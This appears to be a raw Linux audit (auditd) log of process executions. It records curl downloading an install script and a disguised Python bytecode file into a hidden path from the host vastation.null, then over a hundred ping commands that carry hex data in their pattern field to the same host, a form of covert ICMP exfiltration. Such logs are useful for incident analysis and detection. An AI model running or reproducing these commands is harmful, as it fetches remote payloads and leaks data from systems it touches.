type=EXECVE msg=audit(1742907868.476:1044): argc=2 a0="curl" a1="http://vastation.null:8080/install_nptdate.sh"
type=EXECVE msg=audit(1742907868.920:1175): argc=5 a0="curl" a1="-fsSL" a2="http://vastation.null:8080/ntpdate_util.cpython-37.pyc" a3="-o" a4="/opt/fJQsJUNS/.sys"
type=EXECVE msg=audit(1742907868.944:1176): argc=5 a0="curl" a1="-fsSL" a2="http://vastation.null:8080/readme.md" a3="-o" a4="/opt/fJQsJUNS/.rdme"
type=EXECVE msg=audit(1742907871.360:1289): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a08508333fbef26b26cd9e17100edf59" a5="vastation.null"
type=EXECVE msg=audit(1742907871.372:1293): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="8eef494a4028c635873e2b16293b0e7d" a5="vastation.null"
type=EXECVE msg=audit(1742907871.384:1297): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c1d24536d469f7cffac27bac054c66ab" a5="vastation.null"
type=EXECVE msg=audit(1742907871.392:1302): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="34d30beaac97e0bde68266c55c733a5f" a5="vastation.null"
type=EXECVE msg=audit(1742907871.404:1306): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2343b02dddd1ec0cdd49b160051b7d91" a5="vastation.null"
type=EXECVE msg=audit(1742907871.416:1310): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7c44234d6b4298dbbcf7e3c3fd006635" a5="vastation.null"
type=EXECVE msg=audit(1742907871.424:1314): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f26eff1b449b90fa8cfa4640ac11acab" a5="vastation.null"
type=EXECVE msg=audit(1742907871.436:1318): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9d22292d666db61618be241c4747835e" a5="vastation.null"
type=EXECVE msg=audit(1742907871.448:1322): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e7cf0b775e261ddbe4a74cb4292b5159" a5="vastation.null"
type=EXECVE msg=audit(1742907871.456:1326): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="60c746174db575d76d1f1b644c75ca46" a5="vastation.null"
type=EXECVE msg=audit(1742907871.468:1330): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7897aaf73ac977a91e9fd0791d7732bd" a5="vastation.null"
type=EXECVE msg=audit(1742907871.480:1334): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="23bca091aa2a6b76843f1cf806963d12" a5="vastation.null"
type=EXECVE msg=audit(1742907871.492:1338): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7c2e6264f9748d36b08e0980e37560f8" a5="vastation.null"
type=EXECVE msg=audit(1742907871.500:1342): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ae4223ab80cbf46c760ce805e91dbeca" a5="vastation.null"
type=EXECVE msg=audit(1742907871.516:1346): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="52a36aebc216eaaa3180f8a22e587ec7" a5="vastation.null"
type=EXECVE msg=audit(1742907871.524:1350): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="161151392b0976a0a3f8e6ca5afdb8fb" a5="vastation.null"
type=EXECVE msg=audit(1742907871.536:1354): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd691ae3d00dddafd7c339c841ee3e91" a5="vastation.null"
type=EXECVE msg=audit(1742907871.548:1358): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b40a47f0c487242d1e8f75cf4d26e1aa" a5="vastation.null"
type=EXECVE msg=audit(1742907871.556:1362): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="3ca7d93fad84428d337b186924078429" a5="vastation.null"
type=EXECVE msg=audit(1742907871.568:1366): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="08c0e3531f09515e818bba0164b51175" a5="vastation.null"
type=EXECVE msg=audit(1742907871.576:1370): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="72dc4d18f508dff4e8a84e3dfc866aa5" a5="vastation.null"
type=EXECVE msg=audit(1742907871.588:1374): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0ec0905432ae60e30df081390025052d" a5="vastation.null"
type=EXECVE msg=audit(1742907871.596:1378): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46d575a7c198e54ce6bc50cb722c782f" a5="vastation.null"
type=EXECVE msg=audit(1742907871.608:1382): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2b8f9bbd3b2d4863c0d2366939dd2864" a5="vastation.null"
type=EXECVE msg=audit(1742907871.620:1386): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="dcb1f0cf4ff4e0e7dcb3937c81140c9e" a5="vastation.null"
type=EXECVE msg=audit(1742907871.628:1390): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="13f134cdf0a37f570d6409d5a92cd27f" a5="vastation.null"
type=EXECVE msg=audit(1742907871.640:1394): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b67dd6829476afcecc1ebfcbae6b0493" a5="vastation.null"
type=EXECVE msg=audit(1742907871.648:1398): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="84805d513c1e781c0b7c28b1dba6bdc9" a5="vastation.null"
type=EXECVE msg=audit(1742907871.660:1402): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="79dd38368abacc3f8fa8e1631e716f54" a5="vastation.null"
type=EXECVE msg=audit(1742907871.672:1406): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="03611ef4069fa6e65c93dd1e01c89159" a5="vastation.null"
type=EXECVE msg=audit(1742907871.684:1410): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="24cb955dcb6eabb1737f28940d465b94" a5="vastation.null"
type=EXECVE msg=audit(1742907871.692:1414): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="541df8282d478c4b643c9b985ae81799" a5="vastation.null"
type=EXECVE msg=audit(1742907871.708:1418): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7ed61b7a3889672b338001c4fbb9044a" a5="vastation.null"
type=EXECVE msg=audit(1742907871.720:1422): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6ea3c4a5c920ff9c6178f9fe09bf3311" a5="vastation.null"
type=EXECVE msg=audit(1742907871.728:1426): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b9e904b558387e5a101a503f05e78b91" a5="vastation.null"
type=EXECVE msg=audit(1742907871.740:1430): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d736a2f9fabfbc55540d7ba16d7441dd" a5="vastation.null"
type=EXECVE msg=audit(1742907871.752:1434): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="11c6edbc7d23e427aef50c48e7238053" a5="vastation.null"
type=EXECVE msg=audit(1742907871.760:1438): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd4579d869c32814d6c45f676027f9a0" a5="vastation.null"
type=EXECVE msg=audit(1742907871.772:1442): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="910c4d4dc3f9900fffd11fbe869795a8" a5="vastation.null"
type=EXECVE msg=audit(1742907871.780:1446): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="32727a277829abb9112d396a77813c81" a5="vastation.null"
type=EXECVE msg=audit(1742907871.792:1450): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="75ac675c63c485bebe6e10abfc011352" a5="vastation.null"
type=EXECVE msg=audit(1742907871.804:1454): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="44bb76a8c41c5edfb072766b94ce71dd" a5="vastation.null"
type=EXECVE msg=audit(1742907871.812:1458): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="8358d526da1c2ce4a296f0d7a55c95cc" a5="vastation.null"
type=EXECVE msg=audit(1742907871.828:1462): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b366ca5988d5b9db66dcfcf81e5d7c15" a5="vastation.null"
type=EXECVE msg=audit(1742907871.836:1466): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="baaf2f9238e5be6a6ae850a01645cf33" a5="vastation.null"
type=EXECVE msg=audit(1742907871.848:1470): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a034bb9bb7e006999501665908757145" a5="vastation.null"
type=EXECVE msg=audit(1742907871.856:1474): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b77be85a073a7cd6c4027b76102e88f7" a5="vastation.null"
type=EXECVE msg=audit(1742907871.868:1478): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e7a25e226ea60976fc745e8c50be78e1" a5="vastation.null"
type=EXECVE msg=audit(1742907871.876:1482): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2d5f346b7fad3fea8ba45804dff19e81" a5="vastation.null"
type=EXECVE msg=audit(1742907871.888:1486): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2a13f12e149df57133938d93e4692d3d" a5="vastation.null"
type=EXECVE msg=audit(1742907871.900:1490): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e9405ef6eb60229f18dab6820f1e18d0" a5="vastation.null"
type=EXECVE msg=audit(1742907871.908:1494): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6d1dc5a8e4529dc61f79b9516950bff9" a5="vastation.null"
type=EXECVE msg=audit(1742907871.920:1498): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5dcb4064449cf2bbed2b5c4fa69f1bf3" a5="vastation.null"
type=EXECVE msg=audit(1742907871.932:1502): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bfafa8d3768df3309abb9d1cbd6e854e" a5="vastation.null"
type=EXECVE msg=audit(1742907871.940:1506): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="73082573032bf4b0dc3a2b363efbb5d9" a5="vastation.null"
type=EXECVE msg=audit(1742907871.952:1510): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9fa660d2459667f254d993785bda0e5f" a5="vastation.null"
type=EXECVE msg=audit(1742907871.964:1514): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="30d0285c507c26344eb0d5e9fd7bfe27" a5="vastation.null"
type=EXECVE msg=audit(1742907871.972:1518): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="899221a03743d8ccdf05c6695cb91a4c" a5="vastation.null"
type=EXECVE msg=audit(1742907871.984:1522): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="772e23b54266adb3cc880f8aa21439d2" a5="vastation.null"
type=EXECVE msg=audit(1742907871.996:1526): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="414d29a848c20984073459d04ea28009" a5="vastation.null"
type=EXECVE msg=audit(1742907872.004:1530): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9a79d9a4804f254b9fb2a933824a54f3" a5="vastation.null"
type=EXECVE msg=audit(1742907872.016:1534): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0520bf43e3a420d6d4aa9b314a78c848" a5="vastation.null"
type=EXECVE msg=audit(1742907872.028:1538): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1c3b26217c4aacc1aa6bdf755a26ebef" a5="vastation.null"
type=EXECVE msg=audit(1742907872.036:1542): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a3c791783b4ebeb9261fe78d65e3a333" a5="vastation.null"
type=EXECVE msg=audit(1742907872.048:1546): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0c6cb60f5fd26f84e239f4aa1a82dd8e" a5="vastation.null"
type=EXECVE msg=audit(1742907872.060:1550): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ec9a76811bd4cc920c07538b2bfe38fe" a5="vastation.null"
type=EXECVE msg=audit(1742907872.068:1554): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4136983bcc36f55fb8a5614734b91aa0" a5="vastation.null"
type=EXECVE msg=audit(1742907872.080:1558): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f7b8816b643c9f5db5c5488d831fa567" a5="vastation.null"
type=EXECVE msg=audit(1742907872.092:1562): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="fd02a7d78f679b6a3dfc5c36ee4e38f7" a5="vastation.null"
type=EXECVE msg=audit(1742907872.100:1566): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="09f97fc5ae2df433d4f5400bc6b5732c" a5="vastation.null"
type=EXECVE msg=audit(1742907872.112:1570): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="780d18289d376233cbbdc49497dc45cc" a5="vastation.null"
type=EXECVE msg=audit(1742907872.124:1574): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c1c093b41f0e3310ec957e1db401e78f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.136:1578): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d1f9dab1bf21ee9a621b7a437f1eea4d" a5="vastation.null"
type=EXECVE msg=audit(1742907872.148:1582): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5215d271c11c9b536e23be0646ccd857" a5="vastation.null"
type=EXECVE msg=audit(1742907872.156:1586): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="67e7c4e25861ec8440ae3f8214a4a12f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.168:1590): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ecbf4b628b144f55ae6087b67ecde76d" a5="vastation.null"
type=EXECVE msg=audit(1742907872.180:1594): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="187a8a53d48c05a5212ac75f9a54c512" a5="vastation.null"
type=EXECVE msg=audit(1742907872.188:1598): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c360cdd822b3a53abaa5017110c650b5" a5="vastation.null"
type=EXECVE msg=audit(1742907872.196:1602): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2dc7432297f9b462b01aa7a5373fee83" a5="vastation.null"
type=EXECVE msg=audit(1742907872.208:1606): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c72d5c530931d98e7f60056e24998d7c" a5="vastation.null"
type=EXECVE msg=audit(1742907872.220:1610): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a92ec954352f9b88a2341adfff80d168" a5="vastation.null"
type=EXECVE msg=audit(1742907872.228:1614): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b3cd82c6e8b223018538a9b062c740a7" a5="vastation.null"
type=EXECVE msg=audit(1742907872.240:1618): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cbe7f389983921e6cd8e836741aefb7f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.248:1622): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0c2b315a963a863afe94948c93f7add8" a5="vastation.null"
type=EXECVE msg=audit(1742907872.260:1626): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6a81e9e87f0567816dbefdbc2de47986" a5="vastation.null"
type=EXECVE msg=audit(1742907872.272:1630): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1d6ec8c5d1771bf6183119bbd9e72c06" a5="vastation.null"
type=EXECVE msg=audit(1742907872.280:1634): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4d386b24bc2ebb9e289bea6ab9acb351" a5="vastation.null"
type=EXECVE msg=audit(1742907872.292:1638): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cc577438e6f0b0834ed953cbf7d59e92" a5="vastation.null"
type=EXECVE msg=audit(1742907872.304:1642): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="78a8a8fb162b24c8283a295e85ff459b" a5="vastation.null"
type=EXECVE msg=audit(1742907872.312:1646): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="116c186568da1ddefb8f597416d2eda9" a5="vastation.null"
type=EXECVE msg=audit(1742907872.324:1650): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="234e2bcbe9e8552deef6a0ac04879e67" a5="vastation.null"
type=EXECVE msg=audit(1742907872.332:1654): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="44845bc62e4f963f230539b4de5e670e" a5="vastation.null"
type=EXECVE msg=audit(1742907872.344:1658): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cfa2ab2af32fa5f54029b12d471a61cf" a5="vastation.null"
type=EXECVE msg=audit(1742907872.356:1662): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ef764a7eb2f266033edac4ca3d46d99e" a5="vastation.null"
type=EXECVE msg=audit(1742907872.368:1666): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c8c3c5e2352d048fd1375ef992f9db67" a5="vastation.null"
type=EXECVE msg=audit(1742907872.376:1670): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d50d7fc2136279a863a35538960f5b1b" a5="vastation.null"
type=EXECVE msg=audit(1742907872.388:1674): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46ede7acb895ca672cfcde6c6b767e6f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.400:1678): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="dcc7ec5d5f7bb81724c8495dba7587c4" a5="vastation.null"
type=EXECVE msg=audit(1742907872.408:1682): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b69c6e39dd038e46bc13ccf78c497f58" a5="vastation.null"
type=EXECVE msg=audit(1742907872.420:1686): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d1b3b834254195388d0e4f695b28213b" a5="vastation.null"
type=EXECVE msg=audit(1742907872.432:1690): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cd565da5b4c91d365eb6f82a412f8812" a5="vastation.null"
type=EXECVE msg=audit(1742907872.440:1694): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cbbdd4dad9a83d52e9803ca97be4e8be" a5="vastation.null"
type=EXECVE msg=audit(1742907872.452:1698): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="130542894c17a0cb717068fb6797f41d" a5="vastation.null"
type=EXECVE msg=audit(1742907872.464:1702): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9b0b5b9dbb80535e0ba9d0340c135af6" a5="vastation.null"
type=EXECVE msg=audit(1742907872.472:1706): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="550dc7b2deb96ae54727cccedf193e0e" a5="vastation.null"
type=EXECVE msg=audit(1742907872.484:1710): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9401373eb0baf18139f3b028a67eff24" a5="vastation.null"
type=EXECVE msg=audit(1742907872.492:1714): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cd2a2c142e5446deb4955fcc92a4d3fd" a5="vastation.null"
type=EXECVE msg=audit(1742907872.504:1718): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6b15d6c19cca59c6098ce5b3ac6dee26" a5="vastation.null"
type=EXECVE msg=audit(1742907872.516:1722): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="796b487ce6849fe4ff408ce8c7981af0" a5="vastation.null"
type=EXECVE msg=audit(1742907872.524:1726): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="54df72f8ecbf9d6a6217f83cb4e226e9" a5="vastation.null"
type=EXECVE msg=audit(1742907872.536:1730): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7959fdef5fce8e3911fb3be7b9c3d560" a5="vastation.null"
type=EXECVE msg=audit(1742907872.548:1734): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="99b42e242f7fb4c179ece287d063c201" a5="vastation.null"
type=EXECVE msg=audit(1742907872.560:1738): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb081502d51262094d810634e76b1943" a5="vastation.null"
type=EXECVE msg=audit(1742907872.568:1742): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4e0d47fd44449c88b0122bd2d72f979f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.580:1746): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c5da60ce8293cdddc003a25aeeddc97a" a5="vastation.null"
type=EXECVE msg=audit(1742907872.592:1750): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7cf411e8ecd25777c22e29a0955621b8" a5="vastation.null"
type=EXECVE msg=audit(1742907872.600:1754): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="14b57c07d6a12fc26be0a0d53badd02f" a5="vastation.null"
type=EXECVE msg=audit(1742907872.612:1758): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7b029a63154bac37be62dd8f703a6ea2" a5="vastation.null"
type=EXECVE msg=audit(1742907872.624:1762): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d90c148f7bd9cf309fe6ce14060cd7f8" a5="vastation.null"
type=EXECVE msg=audit(1742907872.636:1766): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="30a3cfa98002ab9a21ff114904e9eb03" a5="vastation.null"
type=EXECVE msg=audit(1742907872.644:1770): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="00aa10ab9813aad778306d4ae30c2b80" a5="vastation.null"
type=EXECVE msg=audit(1742907872.656:1774): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="37a18726eb6ac0c2604e2492b0dee571" a5="vastation.null"
type=EXECVE msg=audit(1742907872.664:1778): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7849567c6523aa7fd4f1a7fb28f9fe74" a5="vastation.null"
type=EXECVE msg=audit(1742907872.676:1782): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f281ae75fb9b38183b57db4426e62709" a5="vastation.null"
type=EXECVE msg=audit(1742907872.688:1786): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="3f31cc262d3d93ffa8a49b7b6f7f8fe0" a5="vastation.null"
type=EXECVE msg=audit(1742907872.696:1790): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e5e36f90c4ea692930a709bcf5a734f2" a5="vastation.null"
type=EXECVE msg=audit(1742907872.708:1794): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="de6e51a6e9b258b77c70236c5f4c9762" a5="vastation.null"
type=EXECVE msg=audit(1742907872.716:1798): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6510c7a0a6aacab8a5174523f811c07a" a5="vastation.null"
type=EXECVE msg=audit(1742907872.728:1802): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a93b0ba7cdfce9e2588341c53812f6a8" a5="vastation.null"
type=EXECVE msg=audit(1742907872.740:1806): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="04da20c0540d5c75dad7ea95046873ca" a5="vastation.null"
type=EXECVE msg=audit(1742907872.748:1810): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0a27760a47206d430de31b0f9e89f676" a5="vastation.null"
type=EXECVE msg=audit(1742907872.760:1814): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6e1110df5cb702ec3ad1121da17b0bab" a5="vastation.null"
type=EXECVE msg=audit(1742907872.768:1818): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4c9559bfbe212362018ff328046dba0e" a5="vastation.null"
type=EXECVE msg=audit(1742907872.780:1822): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b822e62f806514c3047389044eec3576" a5="vastation.null"
type=EXECVE msg=audit(1742907872.792:1826): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9d28886e07406d4ab00755d3994f397c" a5="vastation.null"
type=EXECVE msg=audit(1742907872.800:1830): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4e847c3f6e7968f4790f6f0130e397ad" a5="vastation.null"
type=EXECVE msg=audit(1742907872.812:1834): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9f10375ce051ba822101b531155703e9" a5="vastation.null"
type=EXECVE msg=audit(1742907872.820:1838): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9027e9f345841c240e171a946bf5edbe" a5="vastation.null"
type=EXECVE msg=audit(1742907872.832:1842): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4a74d71dfae02b23f14648d626209aad" a5="vastation.null"
type=EXECVE msg=audit(1742907872.840:1846): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1092e7bda5fde59af3e80a884aea615a" a5="vastation.null"
type=EXECVE msg=audit(1742907872.852:1850): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a9228c97227d00080cd206a02d8c4ccf" a5="vastation.null"
type=EXECVE msg=audit(1742907872.864:1854): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9cd3eeb17306be91dcb3768cce0c0ee4" a5="vastation.null"
type=EXECVE msg=audit(1742907872.876:1858): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1de7f3d826be311ec19fe33639941aab" a5="vastation.null"
type=EXECVE msg=audit(1742907872.884:1862): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="967123801ba641fbdc40add880e8ee8a" a5="vastation.null"
type=EXECVE msg=audit(1742907872.896:1866): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="098f05f2147eb8dde96d526e1ef51430" a5="vastation.null"
type=EXECVE msg=audit(1742907872.904:1870): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d5b6e8ceed21a96a84e729b47c5e8963" a5="vastation.null"
type=EXECVE msg=audit(1742907872.916:1874): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f62b2d17e2dfcc4cf92553d8b9dd13ab" a5="vastation.null"
type=EXECVE msg=audit(1742907872.924:1878): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d0d3a5c70d6ac4e9d6e4adc56050f30c" a5="vastation.null"
type=EXECVE msg=audit(1742907872.936:1882): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7240a6dc1cd5d51d6705e7aadb77ca57" a5="vastation.null"
type=EXECVE msg=audit(1742907872.948:1886): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6faf6501acb543126baef6b8d033b83b" a5="vastation.null"
type=EXECVE msg=audit(1742907872.960:1890): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c09d81824ac47ccd61283ac90fe0fe24" a5="vastation.null"
type=EXECVE msg=audit(1742907872.972:1894): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d752129e983c1e965ff59985125dcdd4" a5="vastation.null"
type=EXECVE msg=audit(1742907872.984:1898): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd0488d3f117bc24ce2b27fdd00190ce" a5="vastation.null"
type=EXECVE msg=audit(1742907872.992:1902): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd2597bd9fa03b2a6597913eb0651f37" a5="vastation.null"
type=EXECVE msg=audit(1742907873.004:1906): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="601ce9f0a39d434550ef95bb5c325e5e" a5="vastation.null"
type=EXECVE msg=audit(1742907873.012:1910): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ce983f827d54231eb14d0e08bdee97b8" a5="vastation.null"
type=EXECVE msg=audit(1742907873.024:1914): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="83276a7d778ccb7864a8a5c38c6bc5c1" a5="vastation.null"
type=EXECVE msg=audit(1742907873.032:1918): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="080078f9580ab116c43ebf18f0b2f7e4" a5="vastation.null"
type=EXECVE msg=audit(1742907873.044:1922): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5db7c65a9c7ffbdac34594b7db81dcf4" a5="vastation.null"
type=EXECVE msg=audit(1742907873.052:1926): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="95a55364bd96ab8d58a04a68d5b94ed2" a5="vastation.null"
type=EXECVE msg=audit(1742907873.064:1930): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="764f832d4d4dc2dbf546d3e93a7bed57" a5="vastation.null"
type=EXECVE msg=audit(1742907873.072:1934): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c1b288e7a000018db39cb3084afe99a6" a5="vastation.null"
type=EXECVE msg=audit(1742907873.084:1938): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c720239081279df7aaf4815865358365" a5="vastation.null"
type=EXECVE msg=audit(1742907873.092:1942): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb7ef8e91a89e9b2d86d2e8522ff66a5" a5="vastation.null"
type=EXECVE msg=audit(1742907873.104:1946): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46382bcd62e6cb752dbb2986391ea749" a5="vastation.null"
type=EXECVE msg=audit(1742907873.120:1950): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d48c74e9fa6e2247ce5f2f1cdbf59711" a5="vastation.null"
type=EXECVE msg=audit(1742907873.128:1954): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c87ad2f070dc3abdc080f636041e0f00" a5="vastation.null"
type=EXECVE msg=audit(1742907873.140:1958): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d9353fa39be50372d6bc71f95a7e553c" a5="vastation.null"
type=EXECVE msg=audit(1742907873.152:1962): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="42c795dcfedf1f6404f8f8dd9653c8b1" a5="vastation.null"
type=EXECVE msg=audit(1742907873.160:1966): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c284083ca7373e7e27c81beaa1eddacf" a5="vastation.null"
